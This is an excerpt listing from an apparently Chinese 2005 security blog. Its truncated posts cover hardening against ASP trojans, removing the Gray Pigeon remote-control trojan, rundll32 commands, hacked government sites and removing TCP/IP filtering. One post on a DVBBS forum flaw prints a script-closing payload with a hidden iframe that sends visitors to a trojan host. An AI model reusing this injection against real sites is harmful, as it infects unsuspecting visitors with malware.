English Sentence Loading...
英语句子加载中...
防止ASP木马在服务器上运行
[ 2005-10-08 06:14:32 | 作者: Admin ]
如果您的服务器正在受ASP木马的困扰,那么希望这篇文章能帮您解决您所面临的问题。
目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。
一、使用FileSystemObject组件
FileSystemObject可以对文件进行常规操作
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为FileSystemObject_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
注销此组件命令:RegSrv32 ...
阅读全文...
目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。
一、使用FileSystemObject组件
FileSystemObject可以对文件进行常规操作
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为FileSystemObject_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
注销此组件命令:RegSrv32 ...
阅读全文...
手工清除灰鸽子 Vip 2005
[ 2005-09-21 21:36:18 | 作者: Admin ]
手工清除灰鸽子 Vip 2005
手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。
灰鸽子的运行原理
灰鸽子远程监控软件分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个服务端(俗称种木马)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……,这正违背了我们开发灰鸽子的目的,所以本文适用于那些让人非法安装灰鸽子服务端的用户,帮助用户删除灰鸽子 Vip 2005 的服务端程序。本文大部分内容摘自互联网。
...
阅读全文...
手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。
灰鸽子的运行原理
灰鸽子远程监控软件分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个服务端(俗称种木马)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……,这正违背了我们开发灰鸽子的目的,所以本文适用于那些让人非法安装灰鸽子服务端的用户,帮助用户删除灰鸽子 Vip 2005 的服务端程序。本文大部分内容摘自互联网。
...
阅读全文...
Rundll32.exe文件详解
[ 2005-08-10 23:56:25 | 作者: Admin ]
winexec(Pchar('StrCommand'),sw_Show);
其中"StrCommand"代表以下命令之一(使用Windows中的运行不要加引号):
"rundll32 shell32,Control_RunDLL" - 运行控制面板
"rundll32 shell32,OpenAs_RunDLL" - 打开"打开方式"窗口
"rundll32 shell32,ShellAboutA Info-Box" - 打开"关于"窗口
"rundll32 shell32,Control_RunDLL desk.cpl" - 打开"显示属性"窗口
"rundll32 user,cascadechildwindows" - 层叠全部窗口
"rundll32 user,tilechildwindows" - 最小化所有的子窗口
"rundll32 user,repaintscreen" - 刷新桌面
...
阅读全文...
其中"StrCommand"代表以下命令之一(使用Windows中的运行不要加引号):
"rundll32 shell32,Control_RunDLL" - 运行控制面板
"rundll32 shell32,OpenAs_RunDLL" - 打开"打开方式"窗口
"rundll32 shell32,ShellAboutA Info-Box" - 打开"关于"窗口
"rundll32 shell32,Control_RunDLL desk.cpl" - 打开"显示属性"窗口
"rundll32 user,cascadechildwindows" - 层叠全部窗口
"rundll32 user,tilechildwindows" - 最小化所有的子窗口
"rundll32 user,repaintscreen" - 刷新桌面
...
阅读全文...
政府网站漏洞“黑”不完
[ 2005-08-10 23:52:12 | 作者: Admin ]
中国黑客与外国黑客进行网络战,向来前者都被视为入侵他国政府机构的“危险分子”。不过,中国著名黑客组织“红客”成员却表示,中国官员和民众对网络认识不深,一些专业网络安全公司技术也不成熟,所谓网络安全仅是摆设,网络漏洞将给外国黑客带来入侵中国政府机构网站的机会。
据香港文汇报报道,中国黑客在论坛发布消息指出,国外黑客每天都会公布10个到20个左右的中国政府机构网站;经过第八军团(中国知名黑客组织)技术小组人员了解,该海外黑客组织由国外几个黑客组织共同建立,目前正进行一期入侵检测比赛,中国政府机构网站的主机系统已成为国外黑客的目标。第八军团发现状况后,曾尝试过与几个中国政府机构联系,可是政府机构的回复却是不耐烦,声称他们有相关安全公司为其服务。 这些国外黑客组织声称自己本身是黑客,也是安全专家,他们讨厌设置比较安全的服务器,凡是发现这样的服务器,就想尽办法入侵,并且以各黑客组织所“黑”的网站数目多寡来比较实力。
...
阅读全文...
据香港文汇报报道,中国黑客在论坛发布消息指出,国外黑客每天都会公布10个到20个左右的中国政府机构网站;经过第八军团(中国知名黑客组织)技术小组人员了解,该海外黑客组织由国外几个黑客组织共同建立,目前正进行一期入侵检测比赛,中国政府机构网站的主机系统已成为国外黑客的目标。第八军团发现状况后,曾尝试过与几个中国政府机构联系,可是政府机构的回复却是不耐烦,声称他们有相关安全公司为其服务。 这些国外黑客组织声称自己本身是黑客,也是安全专家,他们讨厌设置比较安全的服务器,凡是发现这样的服务器,就想尽办法入侵,并且以各黑客组织所“黑”的网站数目多寡来比较实力。
...
阅读全文...
去除TCP/IP筛选 - ALway
[ 2005-08-09 04:38:59 | 作者: Admin ]
TCP/IP筛选在注册表里有三处,分别是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
...
阅读全文...
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
...
阅读全文...
新思路现动网新漏洞 - 优格[GXU]
[ 2005-08-09 04:38:31 | 作者: Admin ]
前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。
相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>
在MSN中写入代码:
<Script Language=JavaScript>var actioninfo3='单帖屏蔽'
其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 ...
阅读全文...
相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>
在MSN中写入代码:
<Script Language=JavaScript>var actioninfo3='单帖屏蔽'
其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 ...
阅读全文...
